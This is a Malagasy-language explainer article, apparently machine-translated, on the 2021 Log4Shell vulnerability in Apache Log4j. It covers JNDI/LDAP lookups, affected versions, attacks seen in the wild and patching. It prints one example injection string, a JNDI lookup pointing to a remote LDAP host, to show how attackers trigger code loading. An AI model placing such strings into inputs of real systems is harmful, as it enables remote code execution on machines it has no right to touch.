Fizahan-takelaka[Afeno][Aseho]
Tamin'ny faramparan'ny Novambra 2021, nahita loza mitatao lehibe ho an'ny fiarovana an-tserasera izahay. Mety hisy fiantraikany amin'ny rafitra informatika an-tapitrisany maneran-tany ity fitrandrahana ity.
Ity dia torolàlana momba ny vulnerability Log4j sy ny fomba namela ny 90% amin'ny serivisy informatika eran'izao tontolo izao hisokatra ho an'ny fanafihana.
Apache Log4j dia fitaovana fandraketana Java mifototra amin'ny loharano misokatra novolavolain'ny Apache Software Foundation. Nosoratan'i Ceki Gülcü tamin'ny 2001 tany am-boalohany, dia ao anatin'ny Apache Logging Services, tetikasan'ny Apache Software Foundation.
Mampiasa ny tranomboky Log4j ny orinasa manerana izao tontolo izao mba ahafahana miditra amin'ny rindranasany. Raha ny marina, ny tranomboky Java dia be dia be, azonao jerena ao amin'ny fampiharana avy amin'ny Amazon, Microsoft, Google, sy ny maro hafa.
Ny lazan'ny tranomboky dia midika fa izay mety ho lesoka ao amin'ny kaody dia mety hamela solosaina an-tapitrisany hisokatra ho an'ny hacking. Tamin'ny 24 Novambra 2021, a fiarovana rahona Ny mpikaroka miasa ao amin'ny Alibaba dia nahita lesoka mahatsiravina.
Ny vulnerability Log4j, fantatra ihany koa amin'ny anarana hoe Log4Shell, dia nisy tsy voamarika nanomboka tamin'ny 2013. Ny vulnerability dia nahafahan'ireo mpisehatra ratsy handroaka kaody amin'ireo rafitra voakasik'izany mandeha Log4j. Nambara ampahibemaso tamin'ny 9 Desambra 2021 izany
Ireo manam-pahaizana momba ny indostria dia miantso ny tsy fahampian'ny Log4Shell vulnerability lehibe indrindra amin'ny fahatsiarovana vao haingana.
Tamin'ny herinandro taorian'ny famoahana ilay vulnerability dia nahita fanafihana an-tapitrisany ny ekipan'ny cybersecurity. Ny mpikaroka sasany aza dia nahatsikaritra fanafihana maherin'ny zato isa-minitra.
Ahoana no miasa?
Mba hahatakarana ny antony mahatonga ny Log4Shell ho mampidi-doza dia mila mahatakatra ny fahaizany isika.
Ny vulnerability Log4Shell dia mamela ny famonoana kaody tsy misy dikany, izay midika fa ny mpanafika dia afaka manatanteraka baiko na code amin'ny milina kendrena.
Ahoana no hanatanterahana izany?
Voalohany, mila mahatakatra ny atao hoe JNDI isika.
Ny Java Naming and Directory Interface (JNDI) dia serivisy Java ahafahan'ny programa Java mahita sy mikaroka angona sy loharano amin'ny anarana. Zava-dehibe ireo serivisy lahatahiry ireo satria manome firaketana voarindra ho an'ny mpandrindra mba ho mora tohina rehefa mamorona rindranasa.
Ny JNDI dia afaka mampiasa protocols isan-karazany mba hidirana amina lahatahiry iray. Iray amin'ireo protocole ireo ny Lightweight Directory Access Protocol, na LDAP.
Rehefa manoratra tady, log4j manao fanoloana tady rehefa mifanena amin'ny fomba fiteny ${prefix:name}
.
Ohatra, Text: ${java:version}
dia azo alaina ho Text: Java version 1.8.0_65. Efa mahazatra ireny karazana fanoloana ireny.
Afaka manana fomba fiteny toy ny Text: ${jndi:ldap://example.com/file}
izay mampiasa ny rafitra JNDI hampiditra zavatra Java avy amin'ny URL amin'ny alàlan'ny protocol LDAP.
Mampiditra am-pahombiazana ny angon-drakitra avy amin'io URL io amin'ny milina izany. Izay mety ho mpijirika dia afaka mampiantrano kaody ratsy amin'ny URL ho an'ny daholobe ary miandry ny milina mampiasa Log4j hampiditra azy.
Satria misy angona fehezin'ny mpampiasa ny votoatin'ny hafatra dia afaka mampiditra ny references JNDI azy manokana ireo mpijirika izay manondro ny lohamilina LDAP izay feheziny. Ireo mpizara LDAP ireo dia mety ho feno zavatra Java ratsy izay azon'ny JNDI atao amin'ny alàlan'ny vulnerability.
Ny tena maharatsy izany dia tsy maninona na ny fampiharana dia eo amin'ny sehatry ny serivisy na amin'ny lafiny mpanjifa.
Raha mbola misy fomba ahafahan'ny mpitatitra mamaky ny kaody ratsy ataon'ilay mpanafika, dia mbola misokatra ny fampiharana.
Iza no voakasika?
Ny vulnerability dia misy fiantraikany amin'ny rafitra sy serivisy rehetra mampiasa APache Log4j, miaraka amin'ny dikan-teny 2.0 ka hatramin'ny 2.14.1.
Maro ny manam-pahaizana momba ny fiarovana no manoro hevitra fa ny vulnerability dia mety hisy fiantraikany amin'ny fampiharana maromaro mampiasa Java.
Ny lesoka dia hita voalohany tao amin'ny lalao video Minecraft an'ny Microsoft. Nandrisika ny mpampiasa azy i Microsoft hanavao ny rindrambaiko Minecraft edisiona Java mba hisorohana ny loza mety hitranga.
Jen Easterly, talen'ny Cybersecurity and Infrastructure Security Agency (CISA) dia nilaza fa ny mpivarotra dia manana andraikitra lehibe mba hisorohana ny mpampiasa farany amin'ireo mpilalao ratsy manararaotra an'io vulnerable io.
"Tokony hifampiresaka amin'ny mpanjifany ihany koa ny mpivarotra mba hahazoana antoka fa fantatry ny mpampiasa farany fa misy io vulnerability io ny vokatra ary tokony hanao laharam-pahamehana ny fanavaozana rindrambaiko."
Voalaza fa efa nanomboka ny fanafihana. Symantec, orinasa manome rindrambaiko fiarovana an-tserasera, dia nahita fangatahana fanafihana isan-karazany.
Ireto misy ohatra sasantsasany amin'ireo karazana fanafihana hitan'ny mpikaroka:
- botnets
Botnets dia tambajotran'ny solosaina izay eo ambany fifehezan'ny antoko mpanafika tokana. Manampy amin'ny fanafihan'ny DDoS, mangalatra angon-drakitra ary fisolokiana hafa izy ireo. Ny mpikaroka dia nandinika ny botnet Muhstik tamin'ny sora-baventy nalaina avy amin'ny fitrandrahana Log4j.
- XMRig Miner Trojan
XMRig dia mpitrandraka crypto open-source izay mampiasa CPU hitrandrahana ny mariky ny Monero. Afaka mametraka XMRig amin'ny fitaovan'ny olona ny cybercriminals mba hahafahan'izy ireo mampiasa ny heriny manodina azy tsy amin'ny fahalalany.
- Khonsari Ransomware
Ransomware dia manondro endrika malware natao encrypt rakitra amin'ny solosaina. Ny mpanafika dia afaka mitaky vola ho takalon'ny famerenany ny fidirana amin'ireo rakitra voatahiry. Nahita ny ransomware Khonsari tamin'ny fanafihana Log4Shell ny mpikaroka. Mikendry mpizara Windows izy ireo ary mampiasa ny rafitra .NET.
Inona no hitranga manaraka?
Maminavina ny manam-pahaizana fa mety haharitra volana maromaro na taona maro mihitsy aza ny handaminana tanteraka ny korontana nateraky ny vulnerability Log4J.
Tafiditra ao anatin'ity dingana ity ny fanavaozana ny rafitra rehetra voakasika miaraka amin'ny kinova patched. Na dia voapetaka aza ireo rafitra rehetra ireo, dia mbola misy ny fandrahonana mananontanona ny varavarana ambadika izay mety efa nampidirin'ny mpijirika teo amin'ny varavarankely izay misokatra ho an'ny fanafihana ireo mpizara.
maro vahaolana sy fanalefahana misy mba hisorohana ny rindranasa tsy ho trandrahin'ity bug ity. Ny vaovao Log4j version 2.15.0-rc1 dia nanova toe-javatra isan-karazany mba hanamaivanana io vulnerable io.
Ny endri-javatra rehetra mampiasa JNDI dia ho kilemaina amin'ny alàlan'ny default ary noferana ihany koa ny fitadiavana lavitra. Ny fanesorana ny endri-pikarohana amin'ny fametrahanao Log4j dia hanampy amin'ny fampihenana ny loza mety hitranga.
Eo ivelan'ny Log4j, mbola ilaina ny drafitra midadasika kokoa hisorohana ny fitrandrahana open-source.
Tany am-piandohan'ny volana Mey, ny Trano Fotsy dia namoaka an baiko mpanatanteraka izay mikendry ny fanatsarana ny fiarovana an-tserasera nasionaly. Tafiditra ao anatin'izany ny fanomezan-dàlana ho an'ny volavolan-dalàna momba ny fitaovana (SBOM) izay antontan-taratasy ara-dalàna izay misy ny lisitry ny entana rehetra ilaina amin'ny fananganana ilay fampiharana.
Anisan'izany ny ampahany toy ny loharano misokatra fonosana, miankina, ary API ampiasaina amin'ny fampandrosoana. Na dia manampy amin'ny mangarahara aza ny hevitra momba ny SBOMs, tena hanampy ny mpanjifa ve izany?
Mety ho manahirana be ny fanavaozana ny fiankinan-doha. Ny orinasa dia afaka misafidy fotsiny ny handoa lamandy fa tsy mandany fotoana fanampiny amin'ny fitadiavana fonosana hafa. Angamba ireo SBOM ireo dia ho ilaina ihany raha ny azy sehatra voafetra kokoa.
Famaranana
Ny olana Log4j dia mihoatra noho ny olana ara-teknika ho an'ny fikambanana.
Ny mpitarika orinasa dia tsy maintsy mahafantatra ny loza mety hitranga rehefa miantehitra amin'ny fehezan-dalàna tsy tazonin'izy ireo ny lohamilina, vokatra, na serivisy.
Ny fiankinan-doha amin'ny rindrambaiko open-source sy an'ny antoko fahatelo dia misy risika foana. Tokony handinika ny paikady fanalefahana ny risika ny orinasa alohan'ny hisehoan'ny fandrahonana vaovao.
Ny ankamaroan'ny tranonkala dia miantehitra amin'ny rindrambaiko open-source nokarakarain'ny mpilatsaka an-tsitrapo an'arivony manerantany.
Raha te-hitazona ny tranokala ho toerana azo antoka isika, ny governemanta sy ny orinasa dia tokony hampiasa vola amin'ny famatsiam-bola amin'ny ezaka amin'ny loharanom-baovao misokatra sy ny masoivohon'ny cybersecurity toy ny CISA.
Leave a Reply